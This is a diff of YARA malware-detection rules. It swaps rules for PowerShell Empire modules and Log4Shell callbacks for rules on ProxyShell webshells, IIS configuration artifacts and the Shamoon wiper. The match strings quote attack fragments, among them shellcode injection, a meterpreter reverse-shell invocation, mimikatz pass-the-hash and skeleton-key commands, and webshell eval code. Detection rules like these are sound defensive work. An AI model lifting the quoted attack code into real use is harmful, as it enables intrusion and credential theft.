+		logic_hash = "4ede197d482f0a9e553ba857b5049e7b7405e3df92460e19418fa0653c844982"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "82cada01643a42c8cd9600b8c33f3760d15e5eb6fabec2d531cf13cece095c78"
 
 	strings:
-		$x1 = { 53 00 75 00 63 00 63 00 65 00 00 2F 53 00 6F 00
-               6D 00 65 00 74 00 68 00 69 00 6E 00 67 00 20 00
-               77 00 65 00 6E 00 74 00 20 00 77 00 72 00 6F 00
-               6E 00 67 00 }
-		$x2 = "lnVMODvjSfOQQnfiuFogghlL" fullword ascii
-		$x3 = "E X I T  +R U N A S  /a P P d A T A " fullword ascii
-		$x4 = "uSEsHELLeXECUTE gETeNTRYaSSEMBLY GET" fullword ascii
-		$x5 = "ZahUKBXz" fullword wide
+		$s1 = "Page Language=" ascii nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them )
+		uint32( 0 ) == 0x4e444221 and filesize < 2MB and $s1
 }
-rule SIGNATURE_BASE_Empire_Invoke_Bypassuac : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Aug21_3 : FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-BypassUAC.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8454d929-e184-5be1-b61f-4dfa8f44bdda"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L9-L26"
+		description = "Detects webshells dropped by ProxyShell exploitation based on their file header (must be DER), size and content"
+		author = "Max Altgelt"
+		id = "a7bca62b-c8f1-5a38-81df-f3d4582a590b"
+		date = "2021-08-23"
+		modified = "2025-11-03"
+		reference = "https://twitter.com/gossithedog/status/1429175908905127938?s=12"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L50-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ab0f900a6915b7497313977871a64c3658f3e6f73f11b03d2d33ca61305dc6a8"
-		logic_hash = "1697065405fa0e255cdd77fa39f53866118caf0bad6a3d72756590303610e7b6"
-		score = 70
+		logic_hash = "f071aaa8918b359f786f2ac7447eeaedb5a6fca9e0a0c0e8820e011244424503"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
-		$s2 = "$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru" fullword ascii
-		$s3 = "$Payload = Invoke-PatchDll -DllBytes $Payload -FindString \"ExitThread\" -ReplaceString \"ExitProcess\"" fullword ascii
-		$s4 = "$temp = [System.Text.Encoding]::UNICODE.GetBytes($szTempDllPath)" fullword ascii
+		$s1 = "Page Language=" ascii nocase
 
 	condition:
-		filesize < 1200KB and 3 of them
+		uint16( 0 ) == 0x8230 and filesize < 10KB and $s1
 }
-rule SIGNATURE_BASE_Empire_Lib_Modules_Trollsploit_Message : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Sep21_1 : FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file message.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cb0eee5a-c236-512e-8256-7411a7fb1fd5"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L28-L45"
+		description = "Detects webshells dropped by ProxyShell exploitation based on their file header (must be PST) and base64 decoded request"
+		author = "Tobias Michalski"
+		id = "d0d23e17-6b6a-51d1-afd9-59cc2404bcd8"
+		date = "2021-09-17"
+		modified = "2025-11-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L66-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "71f2258177eb16eafabb110a9333faab30edacf67cb019d5eab3c12d095655d5"
-		logic_hash = "70b7d91395ae30131c1448511425abf32ddedf04632266454aa008330ff28222"
-		score = 70
+		hash = "219468c10d2b9d61a8ae70dc8b6d2824ca8fbe4e53bbd925eeca270fef0fd640"
+		logic_hash = "233ec15dff8da5f2beaa931eb06849aa37e548947c1068d688a1695d977605d8"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "script += \" -\" + str(option) + \" \\\"\" + str(values['Value'].strip(\"\\\"\")) + \"\\\"\"" fullword ascii
-		$s2 = "if option.lower() != \"agent\" and option.lower() != \"computername\":" fullword ascii
-		$s3 = "[String] $Title = 'ERROR - 0xA801B720'" fullword ascii
-		$s4 = "'Value'         :   'Lost contact with the Domain Controller.'" fullword ascii
+		$s = ".FromBase64String(Request["
 
 	condition:
-		filesize < 10KB and 3 of them
+		uint32( 0 ) == 0x4e444221 and any of them
 }
-rule SIGNATURE_BASE_Empire_Persistence : FILE
+rule SIGNATURE_BASE_APT_IIS_Config_Proxyshell_Artifacts : FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file Persistence.psm1"
+		description = "Detects virtual directory configured in IIS pointing to a ProgramData folder (as found in attacks against Exchange servers in August 2021)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0f63b5f4-f933-5821-b0b0-50717e75f6d9"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L47-L63"
+		id = "21888fc0-82c6-555a-9320-9cbb8332a843"
+		date = "2021-08-25"
+		modified = "2025-11-03"
+		reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L82-L105"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ae8875f7fcb8b4de5cf9721a9f5a9f7782f7c436c86422060ecdc5181e31092f"
-		logic_hash = "3c398aa180b6f2225a25f9b1430e89991c7e391930e2be140e89c67da67b3614"
-		score = 70
+		logic_hash = "a4557694629448d258b8b2fefc278e059217560e7a0ec3279863a16fb9b3989c"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "C:\\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -V" ascii
-		$s2 = "# Execute the following to remove the user-level persistent payload" fullword ascii
-		$s3 = "$PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', \"$PersistenceScriptName -Persist\")" fullword ascii
+		$a1 = "<site name=" ascii
+		$a2 = "<sectionGroup name=\"system.webServer\">" ascii
+		$sa1 = " physicalPath=\"C:\\ProgramData\\COM" ascii
+		$sa2 = " physicalPath=\"C:\\ProgramData\\WHO" ascii
+		$sa3 = " physicalPath=\"C:\\ProgramData\\ZING" ascii
+		$sa4 = " physicalPath=\"C:\\ProgramData\\ZOO" ascii
+		$sa5 = " physicalPath=\"C:\\ProgramData\\XYZ" ascii
+		$sa6 = " physicalPath=\"C:\\ProgramData\\AUX" ascii
+		$sa7 = " physicalPath=\"C:\\ProgramData\\CON\\" ascii
+		$sb1 = " physicalPath=\"C:\\Users\\All Users\\" ascii
 
 	condition:
-		filesize < 108KB and 1 of them
+		filesize < 500KB and all of ( $a* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_Empire_Portscan : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Exploitation_Aug21_1 : FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file portscan.py"
+		description = "Detects unknown malicious loaders noticed in August 2021"
 		author = "Florian Roth (Nextron Systems)"
-		id = "23a0f769-9155-5aa0-9200-2baf827bdda4"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L65-L80"
+		id = "1fa563fc-c91c-5f4e-98f1-b895e1acb4f4"
+		date = "2021-08-25"
+		modified = "2025-11-03"
+		reference = "https://twitter.com/VirITeXplorer/status/1430206853733097473"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L107-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b355efa1e7b3681b1402e22c58ce968795ef245fd08a0afb948d45c173e60b97"
-		logic_hash = "162ac4ccc8629a2d017831cdc6d1bf8d7a62b844bf68a0d61956b2f41a5e004b"
-		score = 70
+		logic_hash = "8a2417bb85c7f91d98143d2f4c26d30416b3a01ba8abc1445ccfae5609825b4d"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "script += \"Invoke-PortScan -noProgressMeter -f\"" fullword ascii
-		$s2 = "script += \" | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-Str" ascii
+		$x1 = ");eval/*asf" ascii
 
 	condition:
-		filesize < 14KB and all of them
+		filesize < 600KB and 1 of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Shellcode : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Aug15 : FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41788f71-cc99-50b3-bdc7-17b132ab2767"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L82-L98"
+		description = "Webshells iisstart.aspx and Logout.aspx"
+		author = "Moritz Oettle"
+		id = "b1e6c0f3-787f-59b8-8123-4045522047ca"
+		date = "2021-09-04"
+		modified = "2025-11-03"
+		reference = "https://github.com/hvs-consulting/ioc_signatures/tree/main/Proxyshell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L121-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
-		logic_hash = "968a140f75aa17bd9aac243483cade931dc047854b65b2f61146492c2cf01ea5"
-		score = 70
+		logic_hash = "46c37f1d80c777acafa6ee64d7df18a6b94768f4463d9196027111a84a63a24f"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "C:\\PS> Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbos" ascii
-		$s2 = "\"Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!\" ) )" fullword ascii
-		$s3 = "$RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)" fullword ascii
+		$g1 = "language=\"JScript\"" ascii
+		$g2 = "function getErrorWord" ascii
+		$g3 = "errorWord" ascii
+		$g4 = "Response.Redirect" ascii
+		$g5 = "function Page_Load" ascii
+		$g6 = "runat=\"server\"" ascii
+		$g7 = "Request[" ascii
+		$g8 = "eval/*" ascii
+		$s1 = "AppcacheVer" ascii
+		$s3 = "LaTkWfI64XeDAXZS6pU1KrsvLAcGH7AZOQXjrFkT816RnFYJQR" ascii
+		$fp1 = "<input type=\"submit\" Value=\"Refresh This Page\""
 
 	condition:
-		filesize < 100KB and 1 of them
+		filesize < 1KB and ( 1 of ( $s* ) or 4 of ( $g* ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Empire_Invoke_Mimikatz : FILE
+rule SIGNATURE_BASE_WEBSHELL_Mailbox_Export_PST_Proxyshell_Aug26 : FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Mimikatz.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f7d6c1c4-2a24-54fd-b745-32d7894affc8"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L100-L116"
+		description = "Webshells generated by an Mailbox export to PST and stored as aspx: 570221043.aspx 689193944.aspx luifdecggoqmansn.aspx"
+		author = "Moritz Oettle"
+		id = "6aea414f-d27c-5202-84f8-b8620782fc90"
+		date = "2021-09-04"
+		modified = "2025-11-03"
+		reference = "https://github.com/hvs-consulting/ioc_signatures/tree/main/Proxyshell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L154-L180"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c5481864b757837ecbc75997fa24978ffde3672b8a144a55478ba9a864a19466"
-		logic_hash = "3e16bed3dd7b36920cdf01507f35e38d004e3ce2f3301911a8ee4aedbae6c5c3"
-		score = 70
+		logic_hash = "07acbf74a4bf169fc128cd085759f33e89917e217703b3c6557ba5f954822fd4"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$PEBytes64 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwc" ascii
-		$s2 = "[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)" fullword ascii
-		$s3 = "Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp" fullword ascii
+		$x1 = "!BDN"
+		$g1 = "Page language=" ascii
+		$g2 = "<%@ Page" ascii
+		$g3 = "Request.Item[" ascii
+		$g4 = "\"unsafe\");" ascii
+		$g5 = "<%eval(" ascii
+		$g6 = "script language=" ascii
+		$g7 = "Request[" ascii
+		$s1 = "gold8899" ascii
+		$s2 = "exec_code" ascii
+		$s3 = "orangenb" ascii
 
 	condition:
-		filesize < 2500KB and 2 of them
+		filesize < 500KB and $x1 at 0 and ( 1 of ( $s* ) or 3 of ( $g* ) )
 }
-rule SIGNATURE_BASE_Empire_Lib_Modules_Credentials_Mimikatz_Pth : FILE
+rule SIGNATURE_BASE_SUSP_IIS_Config_Proxyshell_Artifacts : FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file pth.py"
+		description = "Detects suspicious virtual directory configured in IIS pointing to a ProgramData folder (as found in attacks against Exchange servers in August 2021)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f954b7e8-e820-5111-ba8d-a9b9779381b0"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L118-L133"
+		id = "bde65d9e-b17d-5746-8d29-8419363d0511"
+		date = "2021-08-25"
+		modified = "2025-11-03"
+		reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L186-L201"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6dee1cf931e02c5f3dc6889e879cc193325b39e18409dcdaf987b8bf7c459211"
-		logic_hash = "6989c2e50ce642e0300e1293f46cd36e5141274d1e7172a8312595bb515bede2"
+		logic_hash = "f2822a2b762c8e683c5e3a3f4a8232faa187b9a36182ea71e5286158b0e8115c"
 		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
-		$s1 = "command = \"sekurlsa::pth /user:\"+self.options[\"user\"]['Value']" fullword ascii
+		$a1 = "<site name=" ascii
+		$a2 = "<sectionGroup name=\"system.webServer\">" ascii
+		$s1 = " physicalPath=\"C:\\ProgramData\\" ascii
 
 	condition:
-		filesize < 12KB and all of them
+		filesize < 500KB and all of ( $a* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_Empire_Write_Hijackdll : FILE
+rule SIGNATURE_BASE_SUSP_IIS_Config_Virtualdir : FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file Write-HijackDll.ps1"
+		description = "Detects suspicious virtual directory configured in IIS pointing to a User folder"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6a80af21-fb01-5996-b14d-44ff55b7fb3e"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L135-L151"
+		id = "cfe5ca5e-a0cc-5f60-84d2-1b0538e999c7"
+		date = "2021-08-25"
+		modified = "2022-09-17"
+		reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L203-L223"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "155fa7168e28f15bb34f67344f47234a866e2c63b3303422ff977540623c70bf"
-		logic_hash = "e01157fe4adaf647474292bfbbb8196c0b7e89433da52a386a8d9573ae543679"
-		score = 70
+		logic_hash = "0b9be085957f368bc1890c42e3f1e8b974eed8c77ecb4d2ba6add4d877a9b488"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$DllBytes = Invoke-PatchDll -DllBytes $DllBytes -FindString \"debug.bat\" -ReplaceString $BatchPath" fullword ascii
-		$s2 = "$DllBytes32 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBw" ascii
-		$s3 = "[Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)" fullword ascii
+		$a1 = "<site name=" ascii
+		$a2 = "<sectionGroup name=\"system.webServer\">" ascii
+		$s2 = " physicalPath=\"C:\\Users\\" ascii
+		$fp1 = "Microsoft.Web.Administration" wide
+		$fp2 = "<virtualDirectory path=\"/\" physicalPath=\"C:\\Users\\admin\\"
 
 	condition:
-		filesize < 500KB and 2 of them
+		filesize < 500KB and all of ( $a* ) and 1 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Empire_Skeleton_Key : FILE
+rule SIGNATURE_BASE_SUSP_ASPX_Possibledropperartifact_Aug21 : FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file skeleton_key.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d508e09e-13e8-5866-bb5b-0d886f960bb5"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L153-L170"
+		description = "Detects an ASPX file with a non-ASCII header, often a result of MS Exchange drop techniques"
+		author = "Max Altgelt"
+		id = "52016598-74a1-53d6-812a-40b078ba0bb9"
+		date = "2021-08-23"
+		modified = "2025-11-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L225-L255"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3d02f16dcc38faaf5e97e4c5dbddf761f2816004775e6af8826cde9e29bb750f"
-		logic_hash = "910451b2b2ed7cb5f7891d97d15e49da24b182adc903926f539fc4bfe589f2d5"
-		score = 70
+		logic_hash = "7e2fc61897ed859d5165aca7360d8a27891f842a7a8e4894af3926427ac95ceb"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "script += \"Invoke-Mimikatz -Command '\\\"\" + command + \"\\\"';\"" fullword ascii
-		$s2 = "script += '\"Skeleton key implanted. Use password \\'mimikatz\\' for access.\"'" fullword ascii
-		$s3 = "command = \"misc::skeleton\"" fullword ascii
-		$s4 = "\"ONLY APPLICABLE ON DOMAIN CONTROLLERS!\")," fullword ascii
+		$s1 = "Page Language=" ascii nocase
+		$fp1 = "Page Language=\"java\"" ascii nocase
 
 	condition:
-		filesize < 6KB and 2 of them
+		filesize < 500KB and not uint16( 0 ) == 0x4B50 and not uint16( 0 ) == 0x6152 and not uint16( 0 ) == 0x8b1f and not uint16( 0 ) == 0x5A4D and not uint16( 0 ) == 0xCFD0 and not uint16( 0 ) == 0xC3D4 and not uint16( 0 ) == 0x534D and all of ( $s* ) and not 1 of ( $fp* ) and ( ( ( uint8( 0 ) < 0x20 or uint8( 0 ) > 0x7E ) and uint8( 0 ) != 0x9 and uint8( 0 ) != 0x0D and uint8( 0 ) != 0x0A and uint8( 0 ) != 0xEF ) or ( ( uint8( 1 ) < 0x20 or uint8( 1 ) > 0x7E ) and uint8( 1 ) != 0x9 and uint8( 1 ) != 0x0D and uint8( 1 ) != 0x0A and uint8( 1 ) != 0xBB ) or ( ( uint8( 2 ) < 0x20 or uint8( 2 ) > 0x7E ) and uint8( 2 ) != 0x9 and uint8( 2 ) != 0x0D and uint8( 2 ) != 0x0A and uint8( 2 ) != 0xBF ) or ( ( uint8( 3 ) < 0x20 or uint8( 3 ) > 0x7E ) and uint8( 3 ) != 0x9 and uint8( 3 ) != 0x0D and uint8( 3 ) != 0x0A ) or ( ( uint8( 4 ) < 0x20 or uint8( 4 ) > 0x7E ) and uint8( 4 ) != 0x9 and uint8( 4 ) != 0x0D and uint8( 4 ) != 0x0A ) or ( ( uint8( 5 ) < 0x20 or uint8( 5 ) > 0x7E ) and uint8( 5 ) != 0x9 and uint8( 5 ) != 0x0D and uint8( 5 ) != 0x0A ) or ( ( uint8( 6 ) < 0x20 or uint8( 6 ) > 0x7E ) and uint8( 6 ) != 0x9 and uint8( 6 ) != 0x0D and uint8( 6 ) != 0x0A ) or ( ( uint8( 7 ) < 0x20 or uint8( 7 ) > 0x7E ) and uint8( 7 ) != 0x9 and uint8( 7 ) != 0x0D and uint8( 7 ) != 0x0A ) )
 }
-rule SIGNATURE_BASE_Empire_Invoke_Wmi : FILE
+rule SIGNATURE_BASE_WEBSHELL_Proxyshell_Exploitation_Nov21_1
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file invoke_wmi.py"
+		description = "Detects webshells dropped by DropHell malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1e1d1e71-6ea9-500a-b8b8-c48a64bc2b54"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L172-L188"
+		id = "300eaadf-db0c-5591-84fc-abdf7cdd90c1"
+		date = "2021-11-01"
+		modified = "2025-11-03"
+		reference = "https://www.deepinstinct.com/blog/do-not-exchange-it-has-a-shell-inside"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L257-L271"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a914cb227f652734a91d3d39745ceeacaef7a8b5e89c1beedfd6d5f9b4615a1d"
-		logic_hash = "7179a22eec8eb9e59bf590e671e6849d5b960c58eb8fa591bc3b340d64f1d076"
-		score = 70
+		logic_hash = "d9812d3f53c346c4e318609e0c7de66811b27ffa7528a6ddeb6ac8436da59ef5"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
-		$s2 = "script += \";'Invoke-Wmi executed on \" +computerNames +\"'\"" fullword ascii
-		$s3 = "script = \"$PSPassword = \\\"\"+password+\"\\\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Man" ascii
+		$s01 = ".LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request[" ascii wide
+		$s02 = "new System.IO.MemoryStream()" ascii wide
+		$s03 = "Transform(" ascii wide
 
 	condition:
-		filesize < 20KB and 2 of them
+		all of ( $s* )
 }
-rule SIGNATURE_BASE_EXPL_Log4J_Callbackdomain_Iocs_Dec21_1 : CVE_2021_44228
+rule SIGNATURE_BASE_Shamoon2_Wiper : FILE
 {
 	meta:
-		description = "Detects IOCs found in Log4Shell incidents that indicate exploitation attempts of CVE-2021-44228"
+		description = "Detects Shamoon 2.0 Wiper Component"
 		author = "Florian Roth (Nextron Systems)"
-		id = "474afa96-1758-587e-8cab-41c5205e245e"
-		date = "2021-12-12"
-		modified = "2025-03-29"
-		reference = "https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L2-L14"
+		id = "6660a64c-daa4-59e6-aa65-55194cac600c"
+		date = "2016-12-01"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/jKIfGB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shamoon2.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8d5e60f91b715242c6f8ee806ab81d3e296ce1467cf2d065b053f33e3ae00f14"
-		score = 60
-		quality = 60
-		tags = "CVE-2021-44228"
+		logic_hash = "245b03d9606f2e391f53a60aa333c6b037aa1f013794d83b761813d54782b885"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a"
+		hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd"
 
 	strings:
-		$xr1 = /\b(ldap|rmi):\/\/([a-z0-9\.]{1,16}\.bingsearchlib\.com|[a-z0-9\.]{1,40}\.interact\.sh|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):[0-9]{2,5}\/([aZ]|ua|Exploit|callback|[0-9]{10}|http443useragent|http80useragent)\b/
+		$a1 = "\\??\\%s\\System32\\%s.exe" fullword wide
+		$x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide
+		$s1 = "UFWYNYNTS" fullword wide
+		$s2 = "\\\\?\\ElRawDisk" fullword wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )
 }
